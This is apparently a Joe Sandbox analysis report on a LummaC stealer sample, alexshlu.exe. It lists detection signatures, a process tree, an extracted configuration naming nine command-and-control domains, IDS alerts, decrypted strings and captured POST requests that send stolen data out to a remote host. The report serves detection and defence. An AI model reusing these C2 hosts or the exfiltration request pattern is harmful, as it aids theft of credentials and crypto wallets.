Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
alexshlu.exe

Overview

General Information

Sample name:alexshlu.exe
Analysis ID:1577338
MD5:9821fa45714f3b4538cc017320f6f7e5
SHA1:5bf0752889cefd64dab0317067d5e593ba32e507
SHA256:fd9343a395c034e519aea60471c518edbd8cf1b8a236ec924acf06348e6d3a72
Tags:18521511316185215113209bulletproofexeuser-abus3reports
Infos:

Detection

LummaC Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
Machine Learning detection for sample
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64
  • alexshlu.exe (PID: 7620 cmdline: "C:\Users\user\Desktop\alexshlu.exe" MD5: 9821FA45714F3B4538CC017320F6F7E5)
    • conhost.exe (PID: 7628 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • alexshlu.exe (PID: 7720 cmdline: "C:\Users\user\Desktop\alexshlu.exe" MD5: 9821FA45714F3B4538CC017320F6F7E5)
  • cleanup

Malware Configuration

Threatname: LummaC

{"C2 url": ["dwell-exclaim.biz", "formy-spill.biz", "covery-mover.biz", "zinc-sneark.biz", "se-blurry.biz", "impend-differ.biz", "dare-curbys.biz", "drive-connect.cyou", "print-vexer.biz"], "Build id": "FATE99--november"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000003.00000003.1669648156.0000000000CFB000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000003.00000003.1669509041.0000000000CF3000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          Process Memory Space: alexshlu.exe PID: 7720JoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
            Process Memory Space: alexshlu.exe PID: 7720JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              Process Memory Space: alexshlu.exe PID: 7720JoeSecurity_LummaCStealerYara detected LummaC StealerJoe Security
                Click to see the 1 entries

                Sigma Signatures

                No Sigma rule has matched

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-18T12:08:05.461549+010020283713Unknown Traffic192.168.2.84970623.55.153.106443TCP
                2024-12-18T12:08:08.583198+010020283713Unknown Traffic192.168.2.849707172.67.157.254443TCP
                2024-12-18T12:08:12.934292+010020283713Unknown Traffic192.168.2.849708172.67.157.254443TCP
                2024-12-18T12:08:18.263337+010020283713Unknown Traffic192.168.2.849709172.67.157.254443TCP
                2024-12-18T12:08:21.853001+010020283713Unknown Traffic192.168.2.849712172.67.157.254443TCP
                2024-12-18T12:08:26.165876+010020283713Unknown Traffic192.168.2.849713172.67.157.254443TCP
                2024-12-18T12:08:32.213117+010020283713Unknown Traffic192.168.2.849714172.67.157.254443TCP
                2024-12-18T12:08:34.746544+010020283713Unknown Traffic192.168.2.849715172.67.157.254443TCP
                2024-12-18T12:08:40.694942+010020283713Unknown Traffic192.168.2.849716172.67.157.254443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-18T12:08:11.606157+010020546531A Network Trojan was detected192.168.2.849707172.67.157.254443TCP
                2024-12-18T12:08:16.629559+010020546531A Network Trojan was detected192.168.2.849708172.67.157.254443TCP
                2024-12-18T12:08:41.408657+010020546531A Network Trojan was detected192.168.2.849716172.67.157.254443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-18T12:08:11.606157+010020498361A Network Trojan was detected192.168.2.849707172.67.157.254443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-18T12:08:16.629559+010020498121A Network Trojan was detected192.168.2.849708172.67.157.254443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-18T12:08:02.913400+010020579731Domain Observed Used for C2 Detected192.168.2.8587581.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-18T12:08:03.147869+010020579751Domain Observed Used for C2 Detected192.168.2.8517381.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-18T12:08:02.451321+010020579791Domain Observed Used for C2 Detected192.168.2.8633321.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-18T12:08:02.688843+010020579771Domain Observed Used for C2 Detected192.168.2.8499481.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-18T12:08:03.701372+010020579691Domain Observed Used for C2 Detected192.168.2.8637191.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-18T12:08:03.390183+010020579711Domain Observed Used for C2 Detected192.168.2.8607641.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-18T12:08:01.982894+010020579831Domain Observed Used for C2 Detected192.168.2.8560411.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-18T12:08:02.221141+010020579811Domain Observed Used for C2 Detected192.168.2.8652951.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-18T12:08:20.477697+010020480941Malware Command and Control Activity Detected192.168.2.849709172.67.157.254443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-18T12:08:34.751527+010028438641A Network Trojan was detected192.168.2.849715172.67.157.254443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-18T12:08:06.238765+010028586661Domain Observed Used for C2 Detected192.168.2.84970623.55.153.106443TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus detection for URL or domain
                Source: https://impend-differ.biz:443/apiGAvira URL Cloud: Label: malware
                Found malware configuration
                Source: 00000000.00000002.1377966882.0000000002723000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: LummaC {"C2 url": ["dwell-exclaim.biz", "formy-spill.biz", "covery-mover.biz", "zinc-sneark.biz", "se-blurry.biz", "impend-differ.biz", "dare-curbys.biz", "drive-connect.cyou", "print-vexer.biz"], "Build id": "FATE99--november"}
                Multi AV Scanner detection for submitted file
                Source: alexshlu.exeReversingLabs: Detection: 73%
                Source: alexshlu.exeVirustotal: Detection: 75%Perma Link
                Machine Learning detection for sample
                Source: alexshlu.exeJoe Sandbox ML: detected
                Sample uses string decryption to hide its real strings
                Source: 00000003.00000002.1775218648.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: impend-differ.biz
                Source: 00000003.00000002.1775218648.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: print-vexer.biz
                Source: 00000003.00000002.1775218648.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: dare-curbys.biz
                Source: 00000003.00000002.1775218648.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: covery-mover.biz
                Source: 00000003.00000002.1775218648.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: formy-spill.biz
                Source: 00000003.00000002.1775218648.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: dwell-exclaim.biz
                Source: 00000003.00000002.1775218648.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: zinc-sneark.biz
                Source: 00000003.00000002.1775218648.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: se-blurry.biz
                Source: 00000003.00000002.1775218648.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: drive-connect.cyou
                Source: 00000003.00000002.1775218648.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
                Source: 00000003.00000002.1775218648.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
                Source: 00000003.00000002.1775218648.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
                Source: 00000003.00000002.1775218648.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
                Source: 00000003.00000002.1775218648.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: Workgroup: -
                Source: 00000003.00000002.1775218648.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: FATE99--november
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 3_2_00416B7E CryptUnprotectData,3_2_00416B7E
                Source: alexshlu.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: unknownHTTPS traffic detected: 23.55.153.106:443 -> 192.168.2.8:49706 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.8:49707 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.8:49708 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.8:49709 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.8:49712 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.8:49713 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.8:49714 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.8:49715 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.8:49716 version: TLS 1.2
                Source: alexshlu.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_ISOLATION, TERMINAL_SERVER_AWARE
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 0_2_002C0868 FindFirstFileExW,0_2_002C0868
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 0_2_002C0919 FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_002C0919
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 3_2_002C0868 FindFirstFileExW,3_2_002C0868
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 3_2_002C0919 FindFirstFileExW,FindNextFileW,FindClose,FindClose,3_2_002C0919
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+05h]3_2_0040A960
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+79314A46h]3_2_00426170
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 4x nop then push eax3_2_0040C36E
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 4x nop then cmp word ptr [edi+ebx+02h], 0000h3_2_0043DBD0
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 4x nop then mov edx, ecx3_2_00409CC0
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 4x nop then cmp dword ptr [edx+ecx*8], 29DF508Eh3_2_0043DCF0
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 4x nop then mov byte ptr [edx], bl3_2_0040CE55
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax+36A27D27h]3_2_0042C6D7
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 4x nop then mov byte ptr [esi], al3_2_0042C6D7
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+07540F19h]3_2_0042C6D7
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+07540F19h]3_2_0042C6D7
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 4x nop then mov word ptr [eax], dx3_2_00417E82
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 4x nop then cmp dword ptr [edi+ebp*8], 299A4ECDh3_2_0043E690
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax-51BA460Ah]3_2_0042BFD3
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax-51BA460Ah]3_2_0042BFDA
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]3_2_0042A060
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax-0BF7BDDDh]3_2_00425F7D
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 4x nop then mov edx, ecx3_2_0041D074
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 4x nop then mov edx, ecx3_2_0041D087
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 4x nop then mov byte ptr [esi], cl3_2_0042D085
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 4x nop then mov byte ptr [esi], cl3_2_0042D085
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 4x nop then movzx edi, byte ptr [esi+eax-000000BCh]3_2_0041597D
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 4x nop then movzx edi, byte ptr [esi+eax-000000BCh]3_2_00416E97
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 4x nop then mov edi, eax3_2_00416E97
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 4x nop then mov ebx, eax3_2_00405910
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 4x nop then mov ebp, eax3_2_00405910
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 4x nop then cmp dword ptr [ebx+esi*8], B430E561h3_2_00425920
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 4x nop then mov word ptr [eax], cx3_2_004286F0
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 4x nop then movzx edi, byte ptr [esi+eax-000000BCh]3_2_00417190
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 4x nop then mov ecx, eax3_2_00422270
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 4x nop then mov byte ptr [edi+ebx], 00000000h3_2_0040C274
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 4x nop then mov eax, dword ptr [00444284h]3_2_00425230
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 4x nop then mov eax, dword ptr [ebp-10h]3_2_0043CAC0
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+1Ch]3_2_004292D0
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 4x nop then mov edx, ebx3_2_004292D0
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 4x nop then add ebp, dword ptr [esp+0Ch]3_2_0042AAD0
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 4x nop then mov byte ptr [eax], cl3_2_00415ADC
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 4x nop then movzx ebx, bx3_2_0042536C
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 4x nop then movzx ebx, byte ptr [ecx+esi]3_2_00402B70
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 4x nop then mov word ptr [ecx], dx3_2_00427307
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 4x nop then movzx ebp, word ptr [ecx+ebx*2]3_2_00436B20
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 4x nop then mov eax, dword ptr [ebp-10h]3_2_0043CBD6
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]3_2_00407470
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 4x nop then movzx ecx, word ptr [edi+esi*4]3_2_00407470
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 4x nop then jmp eax3_2_0042B475
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], B430E561h3_2_00419C10
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 4x nop then mov eax, dword ptr [ebp-10h]3_2_0043CAC0
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 4x nop then mov eax, dword ptr [ebp-10h]3_2_0043CAC0
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 4x nop then mov eax, dword ptr [ebp-10h]3_2_0043CCE0
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 4x nop then mov byte ptr [ebx], al3_2_0042B4BB
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 4x nop then mov eax, dword ptr [ebp-10h]3_2_0043CD60
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 4x nop then movzx ebx, byte ptr [edx]3_2_004345F0
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+2Ch]3_2_00427653
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 4x nop then mov eax, dword ptr [ebp-10h]3_2_0043CE00
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 4x nop then cmp byte ptr [esi+ebx], 00000000h3_2_0042A630
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx-41h]3_2_004296D8
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 4x nop then movzx edi, byte ptr [esi+ecx-000000BCh]3_2_00415EE0
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 4x nop then mov word ptr [eax], cx3_2_00421EE0
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 4x nop then cmp al, 2Eh3_2_004266E7
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 4x nop then mov word ptr [eax], cx3_2_004286F0
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 4x nop then movzx edi, byte ptr [esi+eax-000000BCh]3_2_00416E97
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 4x nop then mov edi, eax3_2_00416E97
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 4x nop then cmp word ptr [ebp+edx+02h], 0000h3_2_0041CEA5
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 4x nop then add ebx, 03h3_2_00428F5D
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax-0BF7BDDDh]3_2_00425F7D
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 4x nop then cmp dword ptr [ecx+edx*8], B430E561h3_2_00414F08
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 4x nop then mov ecx, edx3_2_00414F08
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 4x nop then mov word ptr [eax], cx3_2_00420717
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 4x nop then mov word ptr [ecx], dx3_2_00420717
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 4x nop then cmp dword ptr [edx+ecx*8], 2298EE00h3_2_0043DFB0

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2057949 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (zinc-sneark .biz) : 192.168.2.8:65295 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2057925 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (covery-mover .biz) : 192.168.2.8:58758 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2057973 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (covery-mover .biz) : 192.168.2.8:58758 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2057943 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (print-vexer .biz) : 192.168.2.8:60764 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2057971 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (print-vexer .biz) : 192.168.2.8:60764 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2057981 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (zinc-sneark .biz) : 192.168.2.8:65295 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2057927 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dare-curbys .biz) : 192.168.2.8:51738 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2057975 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dare-curbys .biz) : 192.168.2.8:51738 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2057931 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (formy-spill .biz) : 192.168.2.8:49948 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2057935 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (impend-differ .biz) : 192.168.2.8:63719 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2057969 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (impend-differ .biz) : 192.168.2.8:63719 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2057977 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (formy-spill .biz) : 192.168.2.8:49948 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2057929 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dwell-exclaim .biz) : 192.168.2.8:63332 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2057979 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dwell-exclaim .biz) : 192.168.2.8:63332 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2057945 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (se-blurry .biz) : 192.168.2.8:56041 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2057983 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (se-blurry .biz) : 192.168.2.8:56041 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.8:49707 -> 172.67.157.254:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.8:49707 -> 172.67.157.254:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.8:49716 -> 172.67.157.254:443
                Source: Network trafficSuricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.8:49706 -> 23.55.153.106:443
                Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.8:49708 -> 172.67.157.254:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.8:49708 -> 172.67.157.254:443
                Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.8:49709 -> 172.67.157.254:443
                Source: Network trafficSuricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.8:49715 -> 172.67.157.254:443
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorURLs: dwell-exclaim.biz
                Source: Malware configuration extractorURLs: formy-spill.biz
                Source: Malware configuration extractorURLs: covery-mover.biz
                Source: Malware configuration extractorURLs: zinc-sneark.biz
                Source: Malware configuration extractorURLs: se-blurry.biz
                Source: Malware configuration extractorURLs: impend-differ.biz
                Source: Malware configuration extractorURLs: dare-curbys.biz
                Source: Malware configuration extractorURLs: drive-connect.cyou
                Source: Malware configuration extractorURLs: print-vexer.biz
                Source: Joe Sandbox ViewIP Address: 23.55.153.106 23.55.153.106
                Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49706 -> 23.55.153.106:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49712 -> 172.67.157.254:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49708 -> 172.67.157.254:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49714 -> 172.67.157.254:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49707 -> 172.67.157.254:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49709 -> 172.67.157.254:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49716 -> 172.67.157.254:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49715 -> 172.67.157.254:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49713 -> 172.67.157.254:443
                Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: lev-tolstoi.com
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 50Host: lev-tolstoi.com
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=N08MCDNNF0PK0HU2ZUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12843Host: lev-tolstoi.com
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=UZISBZQ0QWSQV5User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15054Host: lev-tolstoi.com
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=DBZLQE7OO4ZHJHDXUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20233Host: lev-tolstoi.com
